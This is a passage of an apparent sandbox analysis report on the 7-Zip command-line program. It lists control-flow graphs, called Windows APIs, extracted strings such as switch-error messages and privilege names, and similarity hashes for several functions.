                                                                                                                                        control_flow_graph 2649 26a180-26a1e9 GetProcAddress * 2 2650 26a214-26a22a GetProcAddress 2649->2650 2651 26a1eb-26a1fe GetProcAddress 2649->2651 2652 26a233-26a23e 2650->2652 2654 26a22c-26a22e 2650->2654 2651->2652 2653 26a200-26a20d 2651->2653 2656 26a244-26a2f0 call 243208 call 268928 2652->2656 2657 26a729 2652->2657 2653->2652 2660 26a20f 2653->2660 2655 26a72b-26a73e 2654->2655 2664 26a2f6-26a30a 2656->2664 2665 26a648 2656->2665 2657->2655 2660->2655 2667 26a31c-26a321 2664->2667 2668 26a30c-26a31a 2664->2668 2666 26a718-26a727 call 2694a8 2665->2666 2666->2655 2671 26a328-26a32b 2667->2671 2668->2671 2673 26a32d-26a345 call 24ae2c call 2694a8 2671->2673 2674 26a34a-26a350 2671->2674 2691 26a634-26a63d 2673->2691 2676 26a352-26a36a call 24ae2c call 2694a8 2674->2676 2677 26a36f-26a37d SysStringByteLen 2674->2677 2676->2691 2678 26a383-26a3e3 call 24ae2c * 2 call 243208 * 2 call 268928 2677->2678 2679 26a64d-26a65d call 24ae2c 2677->2679 2701 26a662-26a678 free * 2 2678->2701 2702 26a3e9-26a40c call 268928 2678->2702 2679->2666 2691->2656 2694 26a643 2691->2694 2694->2657 2701->2666 2705 26a412-26a424 call 269d98 2702->2705 2706 26a67d-26a693 free * 2 2702->2706 2708 26a429-26a485 call 2687a8 call 268860 2705->2708 2706->2666 2713 26a48b-26a49c 2708->2713 2714 26a698-26a6ae free * 2 2708->2714 2715 26a4ee-26a51b call 269380 2713->2715 2716 26a49e-26a4a5 2713->2716 2714->2666 2721 26a6b0-26a6d1 free * 3 2715->2721 2722 26a521-26a526 2715->2722 2717 26a4ab-26a4d9 call 2687a8 2716->2717 2726 26a4e5-26a4ec 2717->2726 2727 26a4db-26a4de 2717->2727 2721->2666 2724 26a541-26a564 call 269380 2722->2724 2725 26a528-26a53f call 2698d4 2722->2725 2733 26a6d3-26a6f4 free * 3 2724->2733 2734 26a56a-26a57e call 26a034 2724->2734 2732 26a583-26a5b7 call 268860 2725->2732 2726->2715 2726->2717 2727->2726 2738 26a6f6-26a715 free * 3 2732->2738 2739 26a5bd-26a5c0 2732->2739 2733->2666 2734->2732 2738->2666 2740 26a5c2-26a5ca 2739->2740 2741 26a5cf-26a5e4 call 242130 2739->2741 2740->2741 2744 26a5e6-26a5f6 call 269af0 2741->2744 2745 26a5f8 2741->2745 2747 26a5fb-26a62f call 24b8f0 free * 3 call 2694a8 2744->2747 2745->2747 2747->2691
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                                                                                        • API String ID: 190572456-3984264347
                                                                                                                                        • Opcode ID: 753b0d9ca988719fe0be5fc4b9a7bc1a98751f9b1b540d81fe976a9fa7aa9b16
                                                                                                                                        • Instruction ID: fc00d89e8a9a18c4a6e2a50dfa5095be9165251e2b77064b3cc127484ad8bba9
                                                                                                                                        • Opcode Fuzzy Hash: 753b0d9ca988719fe0be5fc4b9a7bc1a98751f9b1b540d81fe976a9fa7aa9b16
                                                                                                                                        • Instruction Fuzzy Hash: F6D13132279AC096CB20EB22E85079EB3A4F7C5780F945521EA8E57B19DF7CC5A5CF01

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2752 2470c8-2470e4 call 247d4c 2754 2470e9-2470ec 2752->2754 2755 2470ee-2470f0 2754->2755 2756 2470f9-247103 call 249d84 2754->2756 2755->2756 2757 2470f2-2470f4 2755->2757 2761 247105-247107 2756->2761 2762 24710c-247136 call 249ed8 call 243274 call 24376c 2756->2762 2759 247449-247458 2757->2759 2761->2759 2769 247138-247141 2762->2769 2770 24715b-247175 call 243314 2762->2770 2769->2770 2771 247143-247145 2769->2771 2777 24717a-247186 call 24a170 2770->2777 2773 247147 2771->2773 2774 24714c-247155 2771->2774 2776 2473f1-2473fe free 2773->2776 2774->2770 2776->2759 2780 247188-247195 CreateDirectoryW 2777->2780 2781 2471aa-2471ac 2777->2781 2782 247360-247364 2780->2782 2783 24719b-2471a4 GetLastError 2780->2783 2784 2471b2-2471d2 call 243208 call 24a7ec 2781->2784 2785 24727d-247286 GetLastError 2781->2785 2788 247366-247379 call 249ab0 2782->2788 2789 2473c9-2473e1 free * 2 2782->2789 2783->2781 2783->2785 2805 247273-247278 free 2784->2805 2806 2471d8-2471e7 CreateDirectoryW 2784->2806 2786 2472e4-2472ed GetLastError 2785->2786 2787 247288-2472b5 call 247d28 call 243208 call 247ebc 2785->2787 2794 2473e3-2473ee free 2786->2794 2795 2472f3-247301 call 24376c 2786->2795 2828 2472c6-2472db free 2787->2828 2829 2472b7-2472c4 free 2787->2829 2802 247381 2788->2802 2803 24737b-24737f 2788->2803 2789->2759 2794->2776 2809 247307-247309 2795->2809 2810 247432-247447 free * 2 2795->2810 2808 247385-2473a3 call 243460 call 246c84 2802->2808 2803->2808 2805->2785 2812 247356-24735b free 2806->2812 2813 2471ed-2471f6 GetLastError 2806->2813 2834 2473a5-2473a9 2808->2834 2835 2473ad-2473c4 free * 2 2808->2835 2809->2810 2811 24730f-247316 2809->2811 2810->2759 2816 24732c-247332 2811->2816 2817 247318-24731c 2811->2817 2812->2782 2818 247207-247230 call 247d28 call 243208 call 247ebc 2813->2818 2819 2471f8-247202 free 2813->2819 2825 247338-24733c 2816->2825 2826 247419-247430 free * 2 2816->2826 2823 247400-247417 free * 2 2817->2823 2824 247322-247326 2817->2824 2841 247232-24724a free * 2 2818->2841 2842 24724f-247271 free * 2 2818->2842 2819->2786 2823->2759 2824->2816 2824->2823 2825->2777 2831 247342-247351 2825->2831 2826->2759 2833 2472e0-2472e2 2828->2833 2829->2786 2831->2777 2833->2782 2833->2786 2834->2788 2837 2473ab 2834->2837 2835->2759 2837->2789 2841->2786 2842->2833
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00247D4C: GetFileAttributesW.KERNELBASE ref: 00247D6E
                                                                                                                                          • Part of subcall function 00247D4C: GetFileAttributesW.KERNEL32 ref: 00247DA5
                                                                                                                                          • Part of subcall function 00247D4C: free.MSVCRT ref: 00247DB2
                                                                                                                                        • free.MSVCRT ref: 002473F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFilefree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1936811914-0
                                                                                                                                        • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                        • Instruction ID: d4919441e3bc2b1a14d95865637a8c61b4a92be3d1e55ea8b83b023d1796e21d
                                                                                                                                        • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                        • Instruction Fuzzy Hash: 0281852223C581C2CB28EF22E45126E6761FBC5784F441162FF9E8766ADF78C969DF40

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2843 247ebc-247ee3 call 249b68 2846 247ee9-247f26 call 24339c call 249ce4 2843->2846 2847 247fca-247fd6 call 249ddc 2843->2847 2859 247f8c-247fa4 call 2491dc 2846->2859 2860 247f28-247f2c 2846->2860 2853 248253-24828a call 249d0c call 249b30 2847->2853 2854 247fdc-247fe4 2847->2854 2870 248306-24830b 2853->2870 2871 24828c-248294 2853->2871 2854->2853 2857 247fea-24800c call 243274 * 2 2854->2857 2882 24800e-248017 2857->2882 2883 24801b-248020 2857->2883 2874 247fa6 2859->2874 2875 247fa8-247fac 2859->2875 2860->2859 2863 247f2e-247f77 call 24abb0 2860->2863 2863->2859 2881 247f79-247f87 2863->2881 2878 24830d-248312 2870->2878 2879 248318-24831c 2870->2879 2871->2870 2880 248296-2482a5 call 247d4c 2871->2880 2884 247fb9-247fc5 call 2489d8 2874->2884 2876 247fb6 2875->2876 2877 247fae-247fb3 2875->2877 2876->2884 2877->2876 2878->2879 2887 2484f2-248500 call 247978 2878->2887 2889 248377-248381 call 249c80 2879->2889 2890 24831e-248330 call 247d4c 2879->2890 2880->2887 2904 2482ab-2482b2 2880->2904 2892 248519-248524 2881->2892 2882->2883 2885 248040-24804c call 243670 2883->2885 2886 248022-24803e call 242880 2883->2886 2884->2892 2901 248051-248062 call 249ce4 2885->2901 2886->2885 2886->2901 2905 248505-248506 2887->2905 2889->2887 2908 248387-248396 2889->2908 2890->2887 2907 248336-24833d 2890->2907 2917 248064-248067 2901->2917 2918 2480b1-2480bb call 247ebc 2901->2918 2904->2887 2909 2482b8-2482eb call 24339c 2904->2909 2910 248509-248511 call 24794c 2905->2910 2907->2887 2912 248343-248372 2907->2912 2908->2887 2913 24839c-2483a6 call 249ab0 2908->2913 2925 2482fc-248301 2909->2925 2926 2482ed-2482f8 2909->2926 2916 248516 2910->2916 2912->2910 2913->2887 2927 2483ac-2483c2 call 243274 2913->2927 2916->2892 2922 248075-2480a3 2917->2922 2923 248069-24806c 2917->2923 2931 2480c1-248108 call 243314 call 243208 call 247ce0 2918->2931 2933 24823e-24824e free * 2 2918->2933 2930 2480a5-2480af call 243404 2922->2930 2922->2931 2923->2918 2929 24806e-248073 2923->2929 2925->2910 2926->2925 2939 2483c4-2483ce call 242fec 2927->2939 2940 2483d2-2483f2 2927->2940 2929->2918 2929->2922 2930->2931 2953 24815a-248185 free * 2 call 24794c free 2931->2953 2954 24810a-248111 2931->2954 2933->2853 2939->2940 2944 2483f4-2483fe call 242fec 2940->2944 2945 248402-248437 call 247978 2940->2945 2944->2945 2955 248484-24849d call 247d4c 2945->2955 2956 248439-248457 wcscmp 2945->2956 2969 24822d-248239 free 2953->2969 2959 248113-248124 call 242748 2954->2959 2960 24818a-2481c1 SetLastError free * 2 call 24794c free 2954->2960 2970 2484b3-2484f0 call 24339c free 2955->2970 2971 24849f-2484a1 2955->2971 2961 24847c 2956->2961 2962 248459-248477 call 24339c free 2956->2962 2977 2481c3-2481ca 2959->2977 2978 24812a-248158 free call 243208 call 247ce0 2959->2978 2960->2969 2961->2955 2962->2910 2969->2892 2970->2910 2974 2484a7-2484b1 free 2971->2974 2975 2484a3-2484a5 2971->2975 2974->2887 2975->2970 2975->2974 2979 2481e0-24822a call 24362c free * 2 call 24794c free 2977->2979 2980 2481cc-2481d1 2977->2980 2978->2953 2978->2954 2979->2969 2980->2979 2983 2481d3-2481dc 2980->2983 2983->2979
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 0024812F
                                                                                                                                        • free.MSVCRT ref: 0024816A
                                                                                                                                        • free.MSVCRT ref: 0024817F
                                                                                                                                        • free.MSVCRT ref: 00248232
                                                                                                                                          • Part of subcall function 0024ABB0: GetModuleHandleW.KERNEL32 ref: 0024ABD1
                                                                                                                                          • Part of subcall function 0024ABB0: GetProcAddress.KERNEL32 ref: 0024ABE1
                                                                                                                                          • Part of subcall function 0024ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0024AC32
                                                                                                                                        • SetLastError.KERNEL32 ref: 0024818F
                                                                                                                                        • free.MSVCRT ref: 0024819B
                                                                                                                                        • free.MSVCRT ref: 002481A6
                                                                                                                                        • free.MSVCRT ref: 002481BB
                                                                                                                                        • free.MSVCRT ref: 00248243
                                                                                                                                        • free.MSVCRT ref: 0024824E
                                                                                                                                        • free.MSVCRT ref: 0024815F
                                                                                                                                          • Part of subcall function 0024339C: free.MSVCRT ref: 002433D7
                                                                                                                                          • Part of subcall function 0024339C: memmove.MSVCRT(00000000,?,?,00000000,002410A8), ref: 002433F2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                                                                                        • String ID: :$:$DATA$\
                                                                                                                                        • API String ID: 4130059181-1004618218
                                                                                                                                        • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                        • Instruction ID: d050e7d20d4e877457573bb7105cf7ab80b0e6fe8155dc9dff8f23bcf610e3f1
                                                                                                                                        • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                        • Instruction Fuzzy Hash: 20029032529681D6CB28DF2AD49026EB770F795350F808226E79E47B69DF34C9B9CF04

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2991 283e84-283eb5 2992 2841e8 2991->2992 2993 283ebb 2991->2993 2994 2841ea-2841fd 2992->2994 2995 283ebe-283efa fputs call 282e24 2993->2995 2998 283efc-283f03 2995->2998 2999 283f51-283f59 2995->2999 3002 283f1f-283f4c call 243274 call 2830cc free 2998->3002 3003 283f05-283f1d fputs call 242300 2998->3003 3000 283f5b-283f62 2999->3000 3001 283f64-283f6f 2999->3001 3006 283f73-283f9e call 282e24 call 283148 3000->3006 3001->3006 3002->2999 3003->2999 3015 283fa0-283fce fputs * 2 call 242640 call 242300 3006->3015 3016 283fd3-283fe3 call 283034 3006->3016 3015->3016 3020 283fe8-283fea 3016->3020 3020->2994 3022 283ff0-283ff7 3020->3022 3023 283ff9-284027 fputs * 2 call 2426a0 call 242300 3022->3023 3024 28402c-28403c 3022->3024 3023->3024 3024->2994 3029 284042-284048 3024->3029 3030 28404a-284079 3029->3030 3031 2840af-2840b9 3029->3031 3036 2841b9 3030->3036 3037 28407f-284096 call 283034 3030->3037 3032 28419d-2841b1 3031->3032 3033 2840bf-2840e0 fputs 3031->3033 3032->2995 3035 2841b7 3032->3035 3033->3032 3041 2840e6-2840fc 3033->3041 3035->2992 3040 2841bd-2841ca SysFreeString 3036->3040 3044 2841bb 3037->3044 3045 28409c-2840ad SysFreeString 3037->3045 3040->2994 3041->3032 3043 284102-284133 3041->3043 3047 284139-284162 3043->3047 3048 2841cc 3043->3048 3044->3040 3045->3030 3045->3031 3051 2841ce-2841d8 call 24ae2c 3047->3051 3052 284164-284197 call 282ecc call 24ae2c SysFreeString 3047->3052 3049 2841d9-2841e6 SysFreeString 3048->3049 3049->2994 3051->3049 3052->3032 3052->3043
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$FreeString$fputcfree
                                                                                                                                        • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                                                                                        • API String ID: 2701146716-1919703766
                                                                                                                                        • Opcode ID: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                                                                                        • Instruction ID: ae50afe7ba89d92f3f08a1b599161bb1350b429051dfa19517e423b1181b1445
                                                                                                                                        • Opcode Fuzzy Hash: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                                                                                        • Instruction Fuzzy Hash: 56916E3A325A8682DB14EF22E95876E7360F795BC4F409122EE5E47B58DF38C965CB00

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 3059 24f71c-24f74e call 241610 3062 24f774-24f7c2 _isatty * 3 3059->3062 3063 24f750-24f773 call 2602a0 _CxxThrowException 3059->3063 3064 24f7d4 3062->3064 3065 24f7c4-24f7c8 3062->3065 3063->3062 3068 24f7d9-24f81c 3064->3068 3065->3064 3067 24f7ca-24f7ce 3065->3067 3067->3064 3070 24f7d0-24f7d2 3067->3070 3071 24f81e-24f822 3068->3071 3072 24f82a 3068->3072 3070->3068 3071->3072 3073 24f824-24f828 3071->3073 3074 24f830-24f834 3072->3074 3073->3072 3073->3074 3075 24f836 3074->3075 3076 24f83c-24f846 3074->3076 3075->3076 3077 24f854-24f85e 3076->3077 3078 24f848-24f84e 3076->3078 3079 24f860-24f866 3077->3079 3080 24f86c-24f876 3077->3080 3078->3077 3079->3080 3081 24f884-24f88e 3080->3081 3082 24f878-24f87e 3080->3082 3083 24f890-24f89d 3081->3083 3084 24f8f3-24f8fd 3081->3084 3082->3081 3085 24f89f-24f8a9 3083->3085 3086 24f8ab-24f8be call 24ed34 3083->3086 3087 24f8ff-24f917 3084->3087 3088 24f91a-24f931 call 24ac74 * 2 3084->3088 3085->3084 3093 24f8e6-24f8ed 3086->3093 3094 24f8c0-24f8e5 call 2602a0 _CxxThrowException 3086->3094 3087->3088 3096 24f936-24f940 3088->3096 3093->3084 3094->3093 3098 24f946-24f95c 3096->3098 3099 24f9dd-24f9e7 3096->3099 3101 24f965-24f977 wcscmp 3098->3101 3102 24f95e-24f963 3098->3102 3103 24fa94-24fa9c 3099->3103 3104 24f9ed-24f9fa 3099->3104 3105 24f9bb-24f9c2 call 24ad0c 3101->3105 3106 24f979-24f98c call 24ed34 3101->3106 3102->3105 3104->3103 3107 24fa00-24fa1c call 242bc8 call 242d34 3104->3107 3105->3099 3117 24f9c4-24f9d7 call 28d4c0 call 24ac74 3105->3117 3114 24f9b4 3106->3114 3115 24f98e-24f9b3 call 2602a0 _CxxThrowException 3106->3115 3123 24fa1e-24fa3b call 243f78 3107->3123 3124 24fa4f-24fa74 call 2602a0 _CxxThrowException 3107->3124 3114->3105 3115->3114 3117->3099 3132 24fa3d-24fa46 3123->3132 3133 24fa49-24fa4d 3123->3133 3131 24fa75-24fa8f GetCurrentProcess SetProcessAffinityMask free 3124->3131 3131->3103 3132->3133 3133->3124 3133->3131
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Unsupported switch postfix for -slp, xrefs: 0024F991
                                                                                                                                        • Unsupported switch postfix -bb, xrefs: 0024F8C3
                                                                                                                                        • SeRestorePrivilege, xrefs: 0024F91C
                                                                                                                                        • Unsupported switch postfix -stm, xrefs: 0024FA52
                                                                                                                                        • SeLockMemoryPrivilege, xrefs: 0024F9CB
                                                                                                                                        • SeCreateSymbolicLinkPrivilege, xrefs: 0024F92A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                        • API String ID: 1961088698-2328792591
                                                                                                                                        • Opcode ID: 9fbf6495933f589f3caaa937893ccbef6d2c554dfb66b53bc2ba33e20914ec5e
                                                                                                                                        • Instruction ID: 7fd16fac791070850069b949910361c4dbf08f92c343fde0379bd04e025fa105
                                                                                                                                        • Opcode Fuzzy Hash: 9fbf6495933f589f3caaa937893ccbef6d2c554dfb66b53bc2ba33e20914ec5e
                                                                                                                                        • Instruction Fuzzy Hash: 8FA1CF77618BC5CAEB51DF25E5903AD3B60E786B84F988076DB8C07725CF28C9A5C700

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 3134 28a448-28a455 3135 28a49c-28a4a4 3134->3135 3136 28a457-28a45f 3134->3136 3137 28a4f4 3135->3137 3138 28a4a6-28a4a9 3135->3138 3136->3135 3139 28a461-28a495 call 242300 fputs call 2426a0 call 242300 3136->3139 3142 28a4fc-28a50a 3137->3142 3140 28a4ab-28a4da call 242300 fputs call 2426a0 call 242300 3138->3140 3141 28a4df-28a4e5 3138->3141 3139->3135 3140->3141 3141->3142 3145 28a50c 3142->3145 3146 28a53d-28a559 free 3142->3146 3148 28a510-28a526 3145->3148 3150 28a55b 3146->3150 3151 28a58c-28a5b5 free 3146->3151 3153 28a538-28a53b 3148->3153 3154 28a528-28a533 free * 2 3148->3154 3156 28a55f-28a575 3150->3156 3162 28a5c5-28a5c8 3151->3162 3163 28a5b7-28a5be 3151->3163 3153->3146 3153->3148 3154->3153 3160 28a587-28a58a 3156->3160 3161 28a577-28a582 free * 2 3156->3161 3160->3151 3160->3156 3161->3160 3168 28a5ca-28a5e6 _CxxThrowException 3162->3168 3169 28a5e7-28a603 free 3162->3169 3163->3162 3166 28a5c0 3163->3166 3172 28a5c0 call 2866a8 3166->3172 3168->3169 3170 28a605 3169->3170 3171 28a626-28a637 free call 26a13c 3169->3171 3173 28a609-28a624 free 3170->3173 3175 28a63c-28a675 call 287080 call 24182c call 287f50 3171->3175 3172->3162 3173->3171 3173->3173 3182 28a6a8-28a6c9 free 3175->3182 3183 28a677 3175->3183 3185 28a67b-28a691 3183->3185 3186 28a6a3-28a6a6 3185->3186 3187 28a693-28a69e free * 2 3185->3187 3186->3182 3186->3185 3187->3186
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$fputs$ExceptionThrowfputc
                                                                                                                                        • String ID: Errors: $Warnings:
                                                                                                                                        • API String ID: 437615013-2345102087
                                                                                                                                        • Opcode ID: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                                                                                        • Instruction ID: 338ba006111876cb0875e48bba08d5a569b9466b5d39d1f564cbc1592638d97e
                                                                                                                                        • Opcode Fuzzy Hash: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                                                                                        • Instruction Fuzzy Hash: DA51A8167365C181DA34FF26E9913AD6361FB82790F884113DA5D17B99DF3CC4E58B01

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 3188 2683c8-26841d call 246570 call 2431c0 call 248624 3195 268482 3188->3195 3196 26841f-26844c call 2431c0 call 2486dc 3188->3196 3197 268485-268489 3195->3197 3196->3195 3208 26844e-26847b call 2431c0 call 2486dc 3196->3208 3199 26848b-268498 free 3197->3199 3200 268499-26849d 3197->3200 3199->3200 3202 26849f-2684ac free 3200->3202 3203 2684ad-2684b1 3200->3203 3202->3203 3206 2684b3-2684b8 free 3203->3206 3207 2684bd-2684c0 3203->3207 3206->3207 3209 2684c6-2684ee call 243208 call 268290 3207->3209 3210 2685ef-268607 call 243314 free 3207->3210 3208->3195 3224 26847d-268480 3208->3224 3222 2684f0-268516 call 243314 free * 2 3209->3222 3223 26851b-268538 call 268290 3209->3223 3219 26860a-268611 3210->3219 3222->3219 3229 268565-26857b call 268290 3223->3229 3230 26853a-268560 call 243314 free * 2 3223->3230 3224->3197 3235 2685a5-2685bb call 268290 3229->3235 3236 26857d-2685a3 call 243314 free * 2 3229->3236 3230->3219 3241 2685e5-2685ea free 3235->3241 3242 2685bd-2685e3 call 243314 free * 2 3235->3242 3236->3219 3241->3210 3242->3219
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                                                                                        • API String ID: 1534225298-3804457719
                                                                                                                                        • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                        • Instruction ID: 535c84dff2f9ed1f68d3237f169cf0a14230a173fd3a9e277232196a72a8b4bf
                                                                                                                                        • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                        • Instruction Fuzzy Hash: 3951E862224681D0CE24EF16E4513AD6760DBC67E4F941212BE5E177BACF38C6DACB40

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
